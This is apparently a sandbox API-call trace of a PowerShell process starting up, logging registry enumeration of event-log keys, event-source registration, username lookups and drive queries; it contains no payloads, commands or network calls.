RegEnumKeyExW (in: hKey=0x390, dwIndex=0x0, lpName=0x3b8428, lpcchName=0x2ce9b0, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Application", lpcchName=0x2ce9b0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0054.707] RegEnumKeyExW (in: hKey=0x390, dwIndex=0x1, lpName=0x3b8428, lpcchName=0x2ce9b0, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="HardwareEvents", lpcchName=0x2ce9b0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0054.707] RegEnumKeyExW (in: hKey=0x390, dwIndex=0x2, lpName=0x3b8428, lpcchName=0x2ce9b0, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Internet Explorer", lpcchName=0x2ce9b0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0054.708] RegEnumKeyExW (in: hKey=0x390, dwIndex=0x3, lpName=0x3b8428, lpcchName=0x2ce9b0, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Key Management Service", lpcchName=0x2ce9b0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0054.708] RegEnumKeyExW (in: hKey=0x390, dwIndex=0x4, lpName=0x3b8428, lpcchName=0x2ce9b0, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Media Center", lpcchName=0x2ce9b0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0054.708] RegEnumKeyExW (in: hKey=0x390, dwIndex=0x5, lpName=0x3b8428, lpcchName=0x2ce9b0, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="OAlerts", lpcchName=0x2ce9b0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0054.708] RegEnumKeyExW (in: hKey=0x390, dwIndex=0x6, lpName=0x3b8428, lpcchName=0x2ce9b0, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Security", lpcchName=0x2ce9b0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0054.708] RegEnumKeyExW (in: hKey=0x390, dwIndex=0x7, lpName=0x3b8428, lpcchName=0x2ce9b0, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="System", lpcchName=0x2ce9b0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0054.708] RegEnumKeyExW (in: hKey=0x390, dwIndex=0x8, lpName=0x3b8428, lpcchName=0x2ce9b0, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows PowerShell", lpcchName=0x2ce9b0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0054.709] RegOpenKeyExW (in: hKey=0x390, lpSubKey="Application", ulOptions=0x0, samDesired=0x20019, phkResult=0x2ce95c | out: phkResult=0x2ce95c*=0x324) returned 0x0 [0054.709] RegOpenKeyExW (in: hKey=0x324, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x2ce95c | out: phkResult=0x2ce95c*=0x0) returned 0x2 [0054.709] RegOpenKeyExW (in: hKey=0x390, lpSubKey="HardwareEvents", ulOptions=0x0, samDesired=0x20019, phkResult=0x2ce95c | out: phkResult=0x2ce95c*=0x394) returned 0x0 [0054.709] RegOpenKeyExW (in: hKey=0x394, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x2ce95c | out: phkResult=0x2ce95c*=0x0) returned 0x2 [0054.709] RegOpenKeyExW (in: hKey=0x390, lpSubKey="Internet Explorer", ulOptions=0x0, samDesired=0x20019, phkResult=0x2ce95c | out: phkResult=0x2ce95c*=0x398) returned 0x0 [0054.709] RegOpenKeyExW (in: hKey=0x398, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x2ce95c | out: phkResult=0x2ce95c*=0x0) returned 0x2 [0054.709] RegOpenKeyExW (in: hKey=0x390, lpSubKey="Key Management Service", ulOptions=0x0, samDesired=0x20019, phkResult=0x2ce95c | out: phkResult=0x2ce95c*=0x39c) returned 0x0 [0054.710] RegOpenKeyExW (in: hKey=0x39c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x2ce95c | out: phkResult=0x2ce95c*=0x0) returned 0x2 [0054.710] RegOpenKeyExW (in: hKey=0x390, lpSubKey="Media Center", ulOptions=0x0, samDesired=0x20019, phkResult=0x2ce95c | out: phkResult=0x2ce95c*=0x3a0) returned 0x0 [0054.710] RegOpenKeyExW (in: hKey=0x3a0, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x2ce95c | out: phkResult=0x2ce95c*=0x0) returned 0x2 [0054.710] RegOpenKeyExW (in: hKey=0x390, lpSubKey="OAlerts", ulOptions=0x0, samDesired=0x20019, phkResult=0x2ce95c | out: phkResult=0x2ce95c*=0x3a4) returned 0x0 [0054.710] RegOpenKeyExW (in: hKey=0x3a4, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x2ce95c | out: phkResult=0x2ce95c*=0x0) returned 0x2 [0054.710] RegOpenKeyExW (in: hKey=0x390, lpSubKey="Security", ulOptions=0x0, samDesired=0x20019, phkResult=0x2ce95c | out: phkResult=0x2ce95c*=0x3a8) returned 0x0 [0054.710] RegOpenKeyExW (in: hKey=0x3a8, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x2ce95c | out: phkResult=0x2ce95c*=0x0) returned 0x2 [0054.711] RegOpenKeyExW (in: hKey=0x390, lpSubKey="System", ulOptions=0x0, samDesired=0x20019, phkResult=0x2ce95c | out: phkResult=0x2ce95c*=0x3ac) returned 0x0 [0054.711] RegOpenKeyExW (in: hKey=0x3ac, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x2ce95c | out: phkResult=0x2ce95c*=0x0) returned 0x2 [0054.711] RegOpenKeyExW (in: hKey=0x390, lpSubKey="Windows PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x2ce95c | out: phkResult=0x2ce95c*=0x3b0) returned 0x0 [0054.711] RegOpenKeyExW (in: hKey=0x3b0, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x2ce95c | out: phkResult=0x2ce95c*=0x3b4) returned 0x0 [0054.711] RegCloseKey (hKey=0x3b4) returned 0x0 [0054.711] RegCloseKey (hKey=0x390) returned 0x0 [0054.712] RegCloseKey (hKey=0x3b0) returned 0x0 [0054.712] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\EventLog", ulOptions=0x0, samDesired=0x20019, phkResult=0x2ce920 | out: phkResult=0x2ce920*=0x3b0) returned 0x0 [0054.712] RegQueryInfoKeyW (in: hKey=0x3b0, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x2ce988, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x2ce984, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x2ce988*=0x9, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x2ce984*=0x10, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0 [0054.712] RegEnumKeyExW (in: hKey=0x3b0, dwIndex=0x0, lpName=0x3b8428, lpcchName=0x2ce9a4, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Application", lpcchName=0x2ce9a4, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0054.712] RegEnumKeyExW (in: hKey=0x3b0, dwIndex=0x1, lpName=0x3b8428, lpcchName=0x2ce9a4, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="HardwareEvents", lpcchName=0x2ce9a4, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0054.712] RegEnumKeyExW (in: hKey=0x3b0, dwIndex=0x2, lpName=0x3b8428, lpcchName=0x2ce9a4, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Internet Explorer", lpcchName=0x2ce9a4, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0054.712] RegEnumKeyExW (in: hKey=0x3b0, dwIndex=0x3, lpName=0x3b8428, lpcchName=0x2ce9a4, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Key Management Service", lpcchName=0x2ce9a4, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0054.712] RegEnumKeyExW (in: hKey=0x3b0, dwIndex=0x4, lpName=0x3b8428, lpcchName=0x2ce9a4, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Media Center", lpcchName=0x2ce9a4, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0054.712] RegEnumKeyExW (in: hKey=0x3b0, dwIndex=0x5, lpName=0x3b8428, lpcchName=0x2ce9a4, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="OAlerts", lpcchName=0x2ce9a4, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0054.712] RegEnumKeyExW (in: hKey=0x3b0, dwIndex=0x6, lpName=0x3b8428, lpcchName=0x2ce9a4, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Security", lpcchName=0x2ce9a4, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0054.712] RegEnumKeyExW (in: hKey=0x3b0, dwIndex=0x7, lpName=0x3b8428, lpcchName=0x2ce9a4, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="System", lpcchName=0x2ce9a4, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0054.713] RegEnumKeyExW (in: hKey=0x3b0, dwIndex=0x8, lpName=0x3b8428, lpcchName=0x2ce9a4, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows PowerShell", lpcchName=0x2ce9a4, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0054.713] RegOpenKeyExW (in: hKey=0x3b0, lpSubKey="Application", ulOptions=0x0, samDesired=0x20019, phkResult=0x2ce950 | out: phkResult=0x2ce950*=0x390) returned 0x0 [0054.713] RegOpenKeyExW (in: hKey=0x390, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x2ce950 | out: phkResult=0x2ce950*=0x0) returned 0x2 [0054.713] RegOpenKeyExW (in: hKey=0x3b0, lpSubKey="HardwareEvents", ulOptions=0x0, samDesired=0x20019, phkResult=0x2ce950 | out: phkResult=0x2ce950*=0x3b4) returned 0x0 [0054.713] RegOpenKeyExW (in: hKey=0x3b4, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x2ce950 | out: phkResult=0x2ce950*=0x0) returned 0x2 [0054.713] RegOpenKeyExW (in: hKey=0x3b0, lpSubKey="Internet Explorer", ulOptions=0x0, samDesired=0x20019, phkResult=0x2ce950 | out: phkResult=0x2ce950*=0x3b8) returned 0x0 [0054.713] RegOpenKeyExW (in: hKey=0x3b8, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x2ce950 | out: phkResult=0x2ce950*=0x0) returned 0x2 [0054.713] RegOpenKeyExW (in: hKey=0x3b0, lpSubKey="Key Management Service", ulOptions=0x0, samDesired=0x20019, phkResult=0x2ce950 | out: phkResult=0x2ce950*=0x3bc) returned 0x0 [0054.713] RegOpenKeyExW (in: hKey=0x3bc, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x2ce950 | out: phkResult=0x2ce950*=0x0) returned 0x2 [0054.714] RegOpenKeyExW (in: hKey=0x3b0, lpSubKey="Media Center", ulOptions=0x0, samDesired=0x20019, phkResult=0x2ce950 | out: phkResult=0x2ce950*=0x3c0) returned 0x0 [0054.714] RegOpenKeyExW (in: hKey=0x3c0, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x2ce950 | out: phkResult=0x2ce950*=0x0) returned 0x2 [0054.714] RegOpenKeyExW (in: hKey=0x3b0, lpSubKey="OAlerts", ulOptions=0x0, samDesired=0x20019, phkResult=0x2ce950 | out: phkResult=0x2ce950*=0x3c4) returned 0x0 [0054.714] RegOpenKeyExW (in: hKey=0x3c4, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x2ce950 | out: phkResult=0x2ce950*=0x0) returned 0x2 [0054.714] RegOpenKeyExW (in: hKey=0x3b0, lpSubKey="Security", ulOptions=0x0, samDesired=0x20019, phkResult=0x2ce950 | out: phkResult=0x2ce950*=0x3c8) returned 0x0 [0054.714] RegOpenKeyExW (in: hKey=0x3c8, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x2ce950 | out: phkResult=0x2ce950*=0x0) returned 0x2 [0054.714] RegOpenKeyExW (in: hKey=0x3b0, lpSubKey="System", ulOptions=0x0, samDesired=0x20019, phkResult=0x2ce950 | out: phkResult=0x2ce950*=0x3cc) returned 0x0 [0054.714] RegOpenKeyExW (in: hKey=0x3cc, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x2ce950 | out: phkResult=0x2ce950*=0x0) returned 0x2 [0054.714] RegOpenKeyExW (in: hKey=0x3b0, lpSubKey="Windows PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x2ce950 | out: phkResult=0x2ce950*=0x3d0) returned 0x0 [0054.714] RegOpenKeyExW (in: hKey=0x3d0, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x2ce950 | out: phkResult=0x2ce950*=0x3d4) returned 0x0 [0054.714] RegCloseKey (hKey=0x3d4) returned 0x0 [0054.715] RegCloseKey (hKey=0x3b0) returned 0x0 [0054.715] RegCloseKey (hKey=0x3d0) returned 0x0 [0054.718] RegisterEventSourceW (lpUNCServerName=".", lpSourceName="PowerShell") returned 0x4ee0004 [0054.720] GetLastError () returned 0x0 [0054.720] ReportEventW (hEventLog=0x4ee0004, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x342de58*="WSMan", lpRawData=0x342dd00) returned 1 [0054.725] GetLastError () returned 0x0 [0054.726] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3b8428, nSize=0x80 | out: lpBuffer="") returned 0x0 [0054.726] GetLastError () returned 0xcb [0054.726] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2ce4c4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0054.726] GetLastError () returned 0xcb [0054.726] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2ce474, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0054.726] GetLastError () returned 0xcb [0054.726] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2ce474, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0054.726] GetLastError () returned 0xcb [0054.727] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x3b29f8, nSize=0x2ceac4 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x2ceac4) returned 0x1 [0054.727] GetLastError () returned 0xcb [0054.727] GetUserNameW (in: lpBuffer=0x3b8428, pcbBuffer=0x2ceacc | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x2ceacc) returned 1 [0054.727] ReportEventW (hEventLog=0x4ee0004, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x3431d34*="Alias", lpRawData=0x3431bf0) returned 1 [0054.727] GetLastError () returned 0x0 [0054.728] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3b8428, nSize=0x80 | out: lpBuffer="") returned 0x0 [0054.728] GetLastError () returned 0xcb [0054.729] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2ce4c4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0054.729] GetLastError () returned 0xcb [0054.729] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2ce474, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0054.729] GetLastError () returned 0xcb [0054.729] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2ce474, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0054.729] GetLastError () returned 0xcb [0054.729] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x3b29f8, nSize=0x2ceac4 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x2ceac4) returned 0x1 [0054.730] GetLastError () returned 0xcb [0054.730] GetUserNameW (in: lpBuffer=0x3b8428, pcbBuffer=0x2ceacc | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x2ceacc) returned 1 [0054.730] ReportEventW (hEventLog=0x4ee0004, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x3435cc8*="Environment", lpRawData=0x3435b84) returned 1 [0054.730] GetLastError () returned 0x0 [0054.731] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3b8428, nSize=0x80 | out: lpBuffer="") returned 0x0 [0054.731] GetLastError () returned 0xcb [0054.732] GetEnvironmentVariableW (in: lpName="HOMEDRIVE", lpBuffer=0x3b8428, nSize=0x80 | out: lpBuffer="C:") returned 0x2 [0054.732] GetLastError () returned 0xcb [0054.732] GetEnvironmentVariableW (in: lpName="HOMEPATH", lpBuffer=0x3b8428, nSize=0x80 | out: lpBuffer="\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x1b [0054.732] GetLastError () returned 0xcb [0054.732] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz", nBufferLength=0x105, lpBuffer=0x2ce5f4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz", lpFilePart=0x0) returned 0x1d [0054.732] GetLastError () returned 0xcb [0054.732] SetErrorMode (uMode=0x1) returned 0x1 [0054.732] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz"), fInfoLevelId=0x0, lpFileInformation=0x2cea74 | out: lpFileInformation=0x2cea74*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28c670c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2914fe20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2914fe20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1 [0054.732] GetLastError () returned 0xcb [0054.732] SetErrorMode (uMode=0x1) returned 0x1 [0054.735] GetLogicalDrives () returned 0x4 [0054.735] GetLastError () returned 0xcb [0054.737] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x2ce518, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0054.737] GetLastError () returned 0xcb [0054.738] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0054.738] GetLastError () returned 0xcb [0054.738] SetErrorMode (uMode=0x1) returned 0x1 [0054.740] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x3b8528, nVolumeNameSize=0x32, lpVolumeSerialNumber=0x2cea40, lpMaximumComponentLength=0x2cea3c, lpFileSystemFlags=0x2cea38, lpFileSystemNameBuffer=0x3b8428, nFileSystemNameSize=0x32 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x2cea40*=0x9c354b42, lpMaximumComponentLength=0x2cea3c*=0xff, lpFileSystemFlags=0x2cea38*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0054.740] GetLastError () returned 0xcb [0054.740] SetErrorMode (uMode=0x1) returned 0x1 [0054.740] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0054.740] GetLastError () returned 0xcb [0054.740] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x2ce5a0, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0054.740] GetLastError () returned 0xcb [0054.740] SetErrorMode (uMode=0x1) returned 0x1 [0054.741] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x3436f00 | out: lpFileInformation=0x3436f00*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0x17fb5930, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x17fb5930, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1 [0054.741] GetLastError () returned 0xcb [0054.741] SetErrorMode (uMode=0x1) returned 0x1 [0054.741] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x2ce5a0, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0054.741] GetLastError () returned 0xcb [0054.741] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x2ce52c, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0054.741] GetLastError () returned 0xcb [0054.741] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0054.741] GetLastError () returned 0xcb [0054.742] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x2ce4e8, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0054.742] GetLastError () returned 0xcb [0054.742] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0054.742] GetLastError () returned 0xcb [0054.742] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x2ce4f0, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0054.742] GetLastError () returned 0xcb [0054.742] SetErrorMode (uMode=0x1) returned 0x1 [0054.742] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x3437b58 | out: lpFileInformation=0x3437b58*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0x17fb5930, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x17fb5930, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1 [0054.743] GetLastError () returned 0xcb [0054.743] SetErrorMode (uMode=0x1) returned 0x1 [0054.743] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x2ce4f8, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0054.743] GetLastError () returned 0xcb [0054.743] SetErrorMode (uMode=0x1) returned 0x1 [0054.743] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x3437ca8 | out: lpFileInformation=0x3437ca8*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0x17fb5930, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x17fb5930, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1 [0054.743] GetLastError () returned 0xcb [0054.743] SetErrorMode (uMode=0x1) returned 0x1 [0054.743] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x2ce53c, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0054.743] GetLastError () returned 0xcb [0054.743] SetErrorMode (uMode=0x1) returned 0x1 [0054.743] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x3437e48 | out: lpFileInformation=0x3437e48*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0x17fb5930, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x17fb5930, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1 [0054.743] GetLastError () returned 0xcb [0054.743] SetErrorMode (uMode=0x1) returned 0x1 [0054.743] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x3b29f8, nSize=0x2ceac4 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x2ceac4) returned 0x1 [0054.744] GetLastError () returned 0xcb [0054.744] GetUserNameW (in: lpBuffer=0x3b8428, pcbBuffer=0x2ceacc | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x2ceacc) returned 1 [0054.744] ReportEventW (hEventLog=0x4ee0004, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x343abd0*="FileSystem", lpRawData=0x343aa8c) returned 1 [0054.744] GetLastError () returned 0x0 [0054.745] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3b8428, nSize=0x80 | out: lpBuffer="") returned 0x0 [0054.745] GetLastError () returned 0xcb [0054.746] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2ce4e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0054.746] GetLastError () returned 0xcb [0054.746] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2ce490, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0054.746] GetLastError () 